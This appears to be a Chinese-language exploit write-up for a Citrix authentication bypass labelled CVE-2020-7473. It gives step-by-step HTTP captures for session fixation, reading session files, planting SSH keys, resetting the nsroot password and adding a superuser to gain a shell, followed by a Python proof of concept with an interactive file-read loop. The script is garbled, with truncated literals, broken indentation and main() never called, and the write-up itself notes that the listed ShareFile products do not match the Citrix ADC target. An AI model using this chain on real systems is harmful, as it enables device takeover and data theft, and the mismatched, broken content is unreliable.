
# (CVE-2020-7473) Citrix 认证绕过 getshell



ShareFile storage zones Controller 5.9.0

ShareFile storage zones Controller 5.8.0

ShareFile storage zones Controller 5.7.0

ShareFile StorageZones Controller 5.6.0

ShareFile StorageZones Controller 5.5.0

及更早版本的 ShareFile StorageZones Controller。（注意：下文抓包的响应中目标自报为 Citrix ADC，`NS12.1: Build 55.13.nc`，与这里列出的 ShareFile 产品线并不一致，核对受影响产品时请以官方通告为准。）


### 0x01 CreateSession

> request

POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
Host: www.0-sec.org:9080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 C845D9D38B3A68F4F74057DB542AD252 tx/2.0
Content-Length: 44
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
Range: bytes=0-102400
X-Nitro-Pass: jr9bt
X-Nitro-User: boej3

> response

HTTP/1.1 406 Not Acceptable
Date: Sun, 12 Jul 2020 07:52:00 GMT
Server: Apache/2.4.34 (Unix)
Set-Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4489
Connection: close
Content-Type: application/xml; charset=utf-8

An internal server error was encountered
An internal server error was encountered
An internal server error was encountered
An internal server error was encountered
An internal server error was encountered
An internal server error was encountered
An internal server error was encountered
An internal server error was encountered
An internal server error was encountered
An internal server error was encountered


An internal server error was encountered
An internal server error was encountered


An internal server error was encountered
An internal server error was encountered


An internal server error was encountered
An internal server error was encountered


An internal server error was encountered
An internal server error was encountered


### 0x02 fix session

> request

GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1
Host: www.0-sec.org:9080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 C845D9D38B3A68F4F74057DB542AD252 tx/2.0
Accept-Encoding: gzip, deflate
Connection: close
Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57
Range: bytes=0-102400

> response

HTTP/1.1 302 Found
Date: Sun, 12 Jul 2020 07:54:31 GMT
Server: Apache/2.4.34 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: is_cisco_platform=-1; expires=Wed, 07-Jul-2021 07:54:32 GMT; Max-Age=31104000; path=/; HttpOnly
Location: /menu/neo
Content-Length: 416
Connection: close
Content-Type: text/html; charset=UTF-8

An internal server error was encountered
An internal server error was encountered

### 0x03 Get rand_key

> request

GET /menu/stc HTTP/1.1
Host: www.0-sec.org:9080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 C845D9D38B3A68F4F74057DB542AD252 tx/2.0
Accept-Encoding: gzip, deflate
Connection: close
Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; is_cisco_platform=-1
Range: bytes=0-102400

> response

HTTP/1.1 206 Partial Content
Date: Sun, 12 Jul 2020 07:54:35 GMT
Server: Apache/2.4.34 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Range: bytes 0-4149/4150
Content-Length: 15501
Connection: close
Content-Type: text/html; charset=UTF-8

Citrix ADC – Statistics

Error retrieving data.
return code = 354.
Error message = Invalid username or password.

note: var rand = "181103693.1594540472072128";

### 0x04 re-break Session

> request

POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
Host: www.0-sec.org:9080
User-Agent: python-requests/2.20.0
Content-Length: 44
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; is_cisco_platform=-1
Range: bytes=0-102400

> response

HTTP/1.1 406 Not Acceptable
Date: Sun, 12 Jul 2020 07:54:49 GMT
Server: Apache/2.4.34 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4489
Connection: close
Content-Type: application/xml; charset=utf-8

An internal server error was encountered
An internal server error was encountered
An internal server error was encountered
An internal server error was encountered
An internal server error was encountered
An internal server error was encountered
An internal server error was encountered
An internal server error was encountered
An internal server error was encountered
An internal server error was encountered


An internal server error was encountered
An internal server error was encountered


An internal server error was encountered
An internal server error was encountered


An internal server error was encountered
An internal server error was encountered


An internal server error was encountered
An internal server error was encountered


### 0x05 Read Dir

> request

POST /rapi/filedownload?filter=path:%2Fvar%2Fnstmp HTTP/1.1
Host: www.0-sec.org:9080
User-Agent: python-requests/2.20.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/xml
rand_key: 32946879.1594556816473396
Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; is_cisco_platform=0; startupapp=neo
Content-Length: 31

> response

HTTP/1.1 406 Not Acceptable
Date: Sun, 12 Jul 2020 12:27:04 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: -1
Cache-Control: private, must-revalidate, post-check=0, pre-check=0
Pragma: private
Content-Disposition: attachment;filename="nstmp"
Accept-Ranges: bytes
Content-Length: 512
X-XSS-Protection: 1; mode=block
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
Content-Type: application/octet-stream


### 0x06 Read Session

> request

POST /rapi/filedownload?filter=path:%2Fvar%2Fnstmp%2Fsess_6c5c31300c22b200f0273e7a13be47cb HTTP/1.1
Host: www.0-sec.org:9080
User-Agent: python-requests/2.20.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/xml
rand_key: 32946879.1594556816473396
Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; is_cisco_platform=0; startupapp=neo
Content-Length: 31

> response

HTTP/1.1 406 Not Acceptable
Date: Sun, 12 Jul 2020 12:30:33 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: -1
Cache-Control: private, must-revalidate, post-check=0, pre-check=0
Pragma: private
Content-Disposition: attachment;filename="sess_6c5c31300c22b200f0273e7a13be47cb"
Accept-Ranges: bytes
Content-Length: 2162
X-XSS-Protection: 1; mode=block
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream

NSAPI|s:254:”##703FFFA9A2E71F7435B67182A95E196770FF69246DB68B6BE92E825B8A520D00F1FCF6E23F897090DBDEDBE817FFE81D1501200A8BB36C9FFA176EDA41E473DC240A804B90B8BFE1EC30DA87C6FAD3261A8B3C09C7BB82F97DDB3DB41A69CA0B849AFD6B17827463358B700D5847F91F78619B8FA1A98ED4DED3509AB11C”;NSAPI_DOMAIN|s:0:””;NSAPI_PATH|s:1:”/”;login_warning|s:0:””;sysid|s:6:”450070″;oemid|s:1:”0″;superuser|s:4:”true”;nsbw|i:0;ns_is_sgw|s:5:”false”;nsbrandDesc|s:7:”ADC VPX”;username|s:6:”nsroot”;timezone_offset|i:28800;nsversion|s:63:” NS12.1: Build 55.13.nc, Date: Nov 4 2019, 22:20:18 (64-bit)”;nsversion_error|b:0;ns_mode|i:2;nshostDesc|s:22:” (ADC01)”;nsbrand|s:2:”NS”;nsvpx|s:3:”VPX”;ns_model|s:4:”1000″;ns_aws_pin|s:0:””;ns_is_aws|s:5:”false”;ns_is_azure|s:5:”false”;ns_is_gcp|s:5:”false”;rand|s:26:”845810655.1594556994263502″;rand_key|s:26:”13590513441594556994263577″;licenseMap|a:62:{s:2:”wl”;b:1;s:2:”sp”;b:1;s:2:”lb”;b:1;s:2:”cs”;b:1;s:2:”cr”;b:1;s:2:”sc”;b:1;s:3:”cmp”;b:1;s:5:”delta”;b:0;s:2:”pq”;b:1;s:3:”ssl”;b:1;s:4:”gslb”;b:1;s:5:”gslbp”;b:1;s:5:”hdosp”;b:1;s:7:”routing”;b:1;s:2:”cf”;b:1;s:18:”contentaccelerator”;b:0;s:2:”ic”;b:0;s:6:”sslvpn”;b:1;s:14:”f_sslvpn_users”;s:4:”1000″;s:11:”f_ica_users”;s:1:”0″;s:3:”aaa”;b:1;s:4:”ospf”;b:1;s:3:”rip”;b:1;s:3:”bgp”;b:1;s:7:”rewrite”;b:1;s:6:”ipv6pt”;b:1;s:5:”appfw”;b:0;s:9:”responder”;b:1;s:4:”agee”;b:0;s:4:”nsxn”;b:1;s:13:”htmlinjection”;b:1;s:7:”modelid”;s:4:”1000″;s:4:”push”;b:1;s:6:”wionns”;b:1;s:7:”appflow”;b:1;s:11:”cloudbridge”;b:0;s:20:”cloudbridgeappliance”;b:0;s:22:”cloudextenderappliance”;b:0;s:4:”isis”;b:1;s:7:”cluster”;b:1;s:2:”ch”;b:1;s:6:”appqoe”;b:1;s:10:”appflowica”;b:1;s:13:”isstandardlic”;b:0;s:15:”isenterpriselic”;b:1;s:13:”isplatinumlic”;b:0;s:9:”issgwylic”;b:0;s:8:”isswglic”;b:0;s:4:”rise”;b:1;s:3:”feo”;b:1;s:3:”lsn”;b:1;s:13:”licensingmode”;s:5:”Local”;s:16:”daystoexpiration”;s:2:”50″;s:8:”rdpproxy”;b:1;s:3:”rep”;b:0;s:12:”urlfiltering”;b:0;s:17:”videooptimization”;b:0;s:12:”forwardproxy”;b:0;s:15:”sslinterception”;b:0;s:23:”remote
contentinspection”;b:1;s:11:”adaptivetcp”;b:0;s:3:”cqa”;b:0;}grouping_separator|s:1:”,”;decimal_separator|s:1:”.”;defaultpartition|s:7:”default”;

### 0x07 UploadFile Getshell

You can upload to /root/.ssh/authorized_key. Note: get rand_key and
SESSID from the file `sess_[32 characters]`.

> request

POST /rapi/uploadtext HTTP/1.1
Host: www.0-sec.org:9080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://citrix.local/menu/neo
DNT: 1
rand_key: 845810655.1594556994263502
Cookie: SESSID=6c5c31300c22b200f0273e7a13be47cb; startupapp=neo; is_cisco_platform=0; st_splitter=350px; rdx_pagination_size=25%20Per%20Page
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 92


> response

HTTP/1.1 200 OK
Date: Sun, 12 Jul 2020 06:15:05 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-XSS-Protection: 1; mode=block
Content-Length: 34
Content-Type: application/json; charset=utf-8


### 0x08 ChangePassword && SSH

> request

PUT /nitro/v1/config/systemuser HTTP/1.1
Host: www.0-sec.org:9080
Content-Length: 83
Cache-Control: max-age=0
Accept: application/json
rand_key: 845810655.1594556994263502
If-Modified-Since: Thu, 01 Jan 1970 05:30:00 GMT
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
DNT: 1
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7
Cookie: is_cisco_platform=-1; rdx_pagination_size=25%20Per%20Page; SESSID=6c5c31300c22b200f0273e7a13be47cb; startupapp=neo
Connection: close


> response

HTTP/1.1 200 OK
Date: Sun, 12 Jul 2020 12:37:56 GMT
Server: Apache/2.4.34 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 57
Connection: close
Content-Type: application/json; charset=utf-8

{ "errorcode": 0, "message": "Done", "severity": "NONE" }
ssh nsroot@www.0-sec.org
# #
# WARNING: Access to this system is for authorized users only #
# Disconnect IMMEDIATELY if you are not an authorized user! #
# #

Last login: Sun Jul 12 14:12:44 2020 from
> shell
Copyright (c) 1992-2013 The FreeBSD Project.
Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994
The Regents of the University of California. All rights reserved.


### 0x09 CreateUser && SSH

> request:CreateUser

POST /nitro/v1/config/systemuser HTTP/1.1
Host: www.0-sec.org:9080
Content-Length: 83
Cache-Control: max-age=0
Accept: application/json
rand_key: 845810655.1594556994263502
If-Modified-Since: Thu, 01 Jan 1970 05:30:00 GMT
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
DNT: 1
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7
Cookie: is_cisco_platform=-1; rdx_pagination_size=25%20Per%20Page; SESSID=6c5c31300c22b200f0273e7a13be47cb; startupapp=neo
Connection: close


> response:CreateUser

HTTP/1.1 201 Created
Date: Sun, 12 Jul 2020 12:46:55 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
X-XSS-Protection: 1; mode=block
Content-Length: 57
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/json; charset=utf-8

{ "errorcode": 0, "message": "Done", "severity": "NONE" }
> request: binding superadmin policy
POST /nitro/v1/config/systemuser_systemcmdpolicy_binding HTTP/1.1
Host: www.0-sec.org:9080
Content-Length: 83
Cache-Control: max-age=0
Accept: application/json
rand_key: 845810655.1594556994263502
If-Modified-Since: Thu, 01 Jan 1970 05:30:00 GMT
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
DNT: 1
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7
Cookie: is_cisco_platform=-1; rdx_pagination_size=25%20Per%20Page; SESSID=6c5c31300c22b200f0273e7a13be47cb; startupapp=neo
Connection: close

> response: binding superadmin policy
HTTP/1.1 201 Created
Date: Sun, 12 Jul 2020 12:55:27 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
X-XSS-Protection: 1; mode=block
Content-Length: 57
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/json; charset=utf-8

{ "errorcode": 0, "message": "Done", "severity": "NONE" }
ssh nsroot1@www.0-sec.org
# #
# WARNING: Access to this system is for authorized users only #
# Disconnect IMMEDIATELY if you are not an authorized user! #
# #

Last login: Sun Jul 12 20:52:27 2020 from
> shell
Copyright (c) 1992-2013 The FreeBSD Project.
Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994
The Regents of the University of California. All rights reserved.


### poc


#!/usr/bin/env python

import requests
import sys
import string
import random
import json
from urllib.parse import quote


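def random_string(length=8):
    """Return a string of ``length`` pseudo-random ASCII letters and digits.

    Draws from :mod:`random`, which is not a cryptographic source; the helper
    is only suitable for throwaway filler values, never for secrets or tokens
    (use :mod:`secrets` for those).  A ``length`` of 0 yields ``""``.
    """
    alphabet = string.ascii_letters + string.digits
    # One random.choice call per output character keeps the RNG draw order
    # identical to the original loop; the local no longer shadows the
    # function's own name.
    return ''.join(random.choice(alphabet) for _ in range(length))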

def create_session(base_url, session):
# Section 0x01 / 0x04 of the write-up: POST to /pcidss/report on the shared
# requests.Session so the server hands out a SESSID cookie. Returns the same
# session object it was given.
url = ‘{0}/pcidss/report’.format(base_url)

# NOTE(review): the params / headers / data literals are truncated in this
# copy of the script (the dict and string literals are never closed), so the
# function does not parse as pasted.
params = {

headers = {

data = ‘
# verify=False switches off TLS certificate validation for this request.
proxies = {“http”:””}
session.post(url=url, params=params, headers=headers, data=data, verify=False,proxies=proxies)
return session

def fix_session(base_url, session):
# Section 0x02 of the write-up: GET /menu/ss with the SESSID cookie already
# on the session. Nothing is returned; the response is discarded.
url = ‘{0}/menu/ss’.format(base_url)

# NOTE(review): the params literal is truncated in this copy (never closed),
# so the function does not parse as pasted.
params = {
# verify=False switches off TLS certificate validation for this request.
proxies = {“http”:””}
session.get(url=url, params=params, verify=False,proxies=proxies)

def get_rand(base_url, session):
    # Section 0x03 of the write-up: fetch /menu/stc and scrape the value out of
    # the first line that contains 'var rand ='. The value is whatever sits
    # between the first two double quotes on that line; with no matching line
    # the function returns None.
    # verify=False: TLS certificate validation is switched off for this call.
    stats_url = '{0}/menu/stc'.format(base_url)
    page = session.get(url=stats_url, verify=False, proxies={"http": ""})
    hit = next((ln for ln in page.text.split('\n') if 'var rand =' in ln), None)
    if hit is None:
        return None
    return hit.split('"')[1]

def do_lfi(base_url, session, rand):
# Sections 0x05 / 0x06 of the write-up: POST to /rapi/filedownload with a
# filter=path:<file> query. `PAYLOAD` is a module global that is only assigned
# in the __main__ block at the bottom of the script; `rand` is accepted but
# never referenced in this body.
url = ‘{0}/rapi/filedownload?filter=path:{1}’.format(base_url, PAYLOAD)

# NOTE(review): the headers / data literals are truncated in this copy (never
# closed), so the function does not parse as pasted.
headers = {

data = ‘
# verify=False switches off TLS certificate validation for these requests.
proxies = {“http”:””}
r = session.post(url=url, headers=headers, data=data, verify=False,proxies=proxies)
# Serialises the private header store so the membership test below is a plain
# substring search over all response headers.
response_str = json.dumps(r.headers.__dict__[‘_store’])

# Success heuristic taken from the captured responses: HTTP 406 plus a
# Content-Disposition header, Accept-Ranges: bytes and Pragma: private.
# r.headers[...] raises KeyError when either of those two headers is absent.
if r.status_code == 406 and “Content-Disposition” in response_str and r.headers[“Accept-Ranges”] == “bytes” and r.headers[“Pragma”] == “private”:
print (“[+] Send Success!”)
print (“_”*80,”\n\n”)
print (r.text)
print (“_”*80)
# Interactive loop: keeps prompting for a path and re-sending. Each iteration
# is another POST to /rapi/filedownload with a filter=path: query, which is
# what a web-server log of the device would show.
while 1:
PAYLOAD1 = quote(input(“\n[+] Set File= “),”utf-8”)
url = ‘{0}/rapi/filedownload?filter=path:{1}’.format(base_url, PAYLOAD1)
r = session.post(url=url, headers=headers, data=data, verify=False,proxies=proxies)
# NOTE: response_str is never recomputed inside the loop, so the
# Content-Disposition test here still looks at the first response's headers.
if r.status_code == 406 and “Content-Disposition” in response_str and r.headers[“Accept-Ranges”] == “bytes” and r.headers[“Pragma”] == “private”:
print (“_”*80,”\n\n”)
print (r.text)
print (“_”*80)
# pass
print (“[+] Error!”)

def main(base_url):
# Drives sections 0x01-0x05 of the write-up in order: create session, fix
# session, read rand, re-break session, read file. A single requests.Session
# carries the cookies across every step.
print (‘[-] Creating session..’)
session = requests.Session()
create_session(base_url, session)
# KeyError here if the first request did not set a SESSID cookie.
print (‘[+] Got session: {0}’.format(session.cookies.get_dict()[‘SESSID’]))

print(‘[-] Fixing session..’)
fix_session(base_url, session)

print (‘[-] Getting rand..’)
# get_rand returns None when no 'var rand =' line is found; nothing below
# checks for that.
rand = get_rand(base_url, session)
print (‘[+] Got rand: {0}’.format(rand))

print (‘[-] Re-breaking session..’)
create_session(base_url, session)

print (‘[-] Getting file..’)
do_lfi(base_url, session, rand)

if __name__ == ‘__main__’:
# Slashes need to be urlencoded
# sys.argv[1] is read without an argument check: IndexError when the script
# is run with no URL, and again at base_url[-1] if the URL is empty.
base_url = sys.argv[1]
if base_url[-1] == ‘/’:
base_url = base_url[:-1]
# No-op self-assignment left over from editing.
base_url = base_url
# PAYLOAD=’%2fetc%2fpasswd’
# Module global read by do_lfi().
PAYLOAD = quote(input(“[+] Set File= “),”utf-8”)
# NOTE(review): main() is never invoked in this copy of the script; as pasted
# it only collects its inputs and exits.


